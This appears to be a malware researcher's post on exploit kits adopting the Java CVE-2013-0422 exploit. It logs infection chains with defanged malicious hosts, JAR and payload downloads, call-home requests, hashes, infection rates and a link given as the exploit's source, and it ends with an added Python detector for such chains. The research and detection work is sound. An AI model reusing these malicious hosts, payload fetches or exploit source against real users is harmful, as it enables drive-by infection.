Was wondering what to do with that...

Useless video showing live infection (working referrer incl.)

Nuclear Pack :

<edit n 13/01/13 10:00 GMT+1>

<edit 2013-09-06>

And to help figure it out, here is what it was on January 5: the payload was mainly (not only, since it is geo-conditioned) Zaccess.

SofosFO:

Seems it has just been integrated

SofosFO - CVE-2013-0422 Positive path

ProPack Sploit Pack :

ProPack EK CVE-2013-0422 positive path

</edit n>

<edit n+2 13/01/13 21:00>

Sweet Orange :

Sweet Orange Positive Path on CVE-2013-0422

and Lucky Locker (aka Lyposit) call home

</edit n+2>

<edit n+1 2013-01-13 - 19h GMT+1>

</edit n+1>

Found many since 2 days, but first one integrating the CVE. Have been told that it's integrated since at least 2013-01-11.

GET http://tropical.finale.ceapy-wirealtyseou .org/dank-cashier.html 200 OK (text/html)
GET http://tropical.finale.ceapy-wirealtyseou .org/psemzhFIKWDhIWDmhwGKhDyFppGwK/QmxmlmQlwUo00/packets.js 200 OK (text/html)
GET http://tropical.finale.ceapy-wirealtyseou .org/7afdfihFIKWDhIWDmhwGKhDyFppGwy/010922216/terrorist.jar 200 OK (application/java-archive)
GET http://tropical.finale.ceapy-wirealtyseou .org/7afdfihFIKWDhIWDmhwGKhDyFppGwy/010922216/terrorist.jar 200 OK (application/java-archive) c1638d5ee237fc3228121b389d1cd3b0
GET http://tropical.finale.ceapy-wirealtyseou .org/7afdfihFIKWDhIWDmhwGKhDyFppGwy/010922216/4393992 200 OK (application/octet-stream)

Thanks to @switchingtoguns for that one.

GET http://46.30.42 .195/build2/doc/4yioqp.php 200 OK (text/html)
GET http://46.30.42 .195/build2/doc/axhncumubx.php?k=32203313104201 200 OK (application/java-archive)
GET http://46.30.42 .195/build2/doc/gneyipb.php?k=32203313104201 200 OK (application/java-archive)
GET http://46.30.42 .195/build2/doc/jxipmwgoksgu.php?k=32203313104201 200 OK (text/html)
GET http://46.30.42 .195/build2/doc/4mx57e.php?j=1&k=1 200 OK (application/octet-stream) ac91753182db3a9562a27bd78c95972e (Zaccess)

SofosFO Fiddler file: http://goo.gl/CB5mb

GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/plugins.php?arrowwiki=988&profile=193&scripts=194&users=78&baseball=950&movies=698&photoshop=16 200 OK (text/html)
GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/wLsShgHc 200 OK (application/x-java-archive)
GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/Fxptg 200 OK (application/x-java-archive)
GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/wLsShgHc 200 OK (application/x-java-archive)
GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/Fxptg 200 OK (application/x-java-archive)
GET http://rubefasttrack .info/products.php?info=53&mapa=334&classes=12&pages=677&sport=1251&hotel=81&free=178&intl=58&style=604&openparadise1=299 200 OK (application/octet-stream)
GET http://b4wd52ftevtwvd .org/ad4/?jlrhg=rFssAhgRAFQ4SDEAAQAAAAUQ1KCkeEiX 200 OK (application/octet-stream) (Lyposit/Lucky Locker call home)

SWT Fiddler file: http://goo.gl/4cDMy

Have seen some stats from an EK featuring this CVE. The successful infection rate was between 13% and 15% overall (double the usual rate on that EK). In DK it seems the rate is higher, from 25% to 30%. Have been told that one explanation could be that banks require Java to log in in that country.

Source of the exploit: http://pastebin.com/raw.php?i=cUG2ayjh - Gdark - DamageLabs
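The captures above all show the same shape: a text/html landing page, one or more Java archives (the CVE-2013-0422 exploit), then an application/octet-stream response that is the dropped payload, possibly from a different host than the landing page (Sweet Orange drops from rubefasttrack .info after exploiting from fluorescentgrandfather .info). The following is an added example, not code from the original post or from any of these kits: it walks a Fiddler-style request log in session order and emits one finding per landing -> jar -> payload chain. The sample log is constructed from the request lines quoted above (hostnames kept defanged as in the post) plus one hypothetical benign host, clean-site.example, to show a download that is not flagged because no Java archive preceded it.

```python
"""Flag exploit-kit "positive paths" in a Fiddler-style request log.

Added example (not code from the original post). The chain it looks for is
the one visible in the captures above: text/html landing -> Java archive ->
application/octet-stream payload, where the payload may come from another
host than the landing page.
"""
import re
from dataclasses import dataclass

# Constructed sample: request lines from the post's captures, one benign
# hypothetical session (clean-site.example) appended as a negative case.
SAMPLE_LOG = """\
GET http://tropical.finale.ceapy-wirealtyseou .org/dank-cashier.html 200 OK (text/html)
GET http://tropical.finale.ceapy-wirealtyseou .org/psemzhFIKWDhIWDmhwGKhDyFppGwK/QmxmlmQlwUo00/packets.js 200 OK (text/html)
GET http://tropical.finale.ceapy-wirealtyseou .org/7afdfihFIKWDhIWDmhwGKhDyFppGwy/010922216/terrorist.jar 200 OK (application/java-archive)
GET http://tropical.finale.ceapy-wirealtyseou .org/7afdfihFIKWDhIWDmhwGKhDyFppGwy/010922216/4393992 200 OK (application/octet-stream)
GET http://46.30.42 .195/build2/doc/4yioqp.php 200 OK (text/html)
GET http://46.30.42 .195/build2/doc/axhncumubx.php?k=32203313104201 200 OK (application/java-archive)
GET http://46.30.42 .195/build2/doc/gneyipb.php?k=32203313104201 200 OK (application/java-archive)
GET http://46.30.42 .195/build2/doc/jxipmwgoksgu.php?k=32203313104201 200 OK (text/html)
GET http://46.30.42 .195/build2/doc/4mx57e.php?j=1&k=1 200 OK (application/octet-stream)
GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/plugins.php?arrowwiki=988&profile=193&scripts=194&users=78&baseball=950&movies=698&photoshop=16 200 OK (text/html)
GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/wLsShgHc 200 OK (application/x-java-archive)
GET http://rubefasttrack .info/products.php?info=53&mapa=334&classes=12&pages=677&sport=1251&hotel=81&free=178&intl=58&style=604&openparadise1=299 200 OK (application/octet-stream)
GET http://b4wd52ftevtwvd .org/ad4/?jlrhg=rFssAhgRAFQ4SDEAAQAAAAUQ1KCkeEiX 200 OK (application/octet-stream)
GET http://clean-site.example/index.html 200 OK (text/html)
GET http://clean-site.example/files/report.pdf 200 OK (application/octet-stream)
"""

# Request line as written in the post: "GET <url> <status> OK (<content-type>)".
# The non-greedy URL group tolerates the " ." defanging inside hostnames.
LINE_RE = re.compile(
    r"^GET\s+(?P<url>http://.*?)\s+(?P<status>\d{3})\s+OK\s+\((?P<ctype>[^)]+)\)"
)

JAR_TYPES = {"application/java-archive", "application/x-java-archive"}
PAYLOAD_TYPE = "application/octet-stream"


@dataclass
class PositivePath:
    landing: str
    jar: str
    payload: str


def parse_log(log: str) -> list[tuple[str, str, str]]:
    """Return (url, status, content-type) for every line that parses; skip the rest."""
    rows = []
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m["url"], m["status"], m["ctype"]))
    return rows


def positive_paths(log: str) -> list[PositivePath]:
    """Walk the session in order; emit one finding per landing -> jar -> payload chain.

    State is deliberately not keyed by host: the payload and the call-home
    can come from hosts other than the one serving the jar.
    """
    findings = []
    landing = None  # first text/html seen since the last completed chain
    jar = None      # first Java archive seen after that landing
    for url, status, ctype in parse_log(log):
        if status != "200":
            continue
        if ctype == "text/html":
            if landing is None:
                landing = url
        elif ctype in JAR_TYPES:
            if jar is None:
                jar = url  # repeat fetches of the same jar are common; keep the first
        elif ctype == PAYLOAD_TYPE and jar is not None:
            findings.append(PositivePath(landing or "", jar, url))
            landing = jar = None  # look for the next chain
    return findings


if __name__ == "__main__":
    for f in positive_paths(SAMPLE_LOG):
        print(f"landing={f.landing}\n  jar={f.jar}\n  payload={f.payload}")
```

An octet-stream with no preceding Java archive (the Lyposit call-home line, the benign PDF) is not flagged; a text/html hit between the jar and the payload (the SofosFO jxipmwgoksgu.php request) does not break the chain.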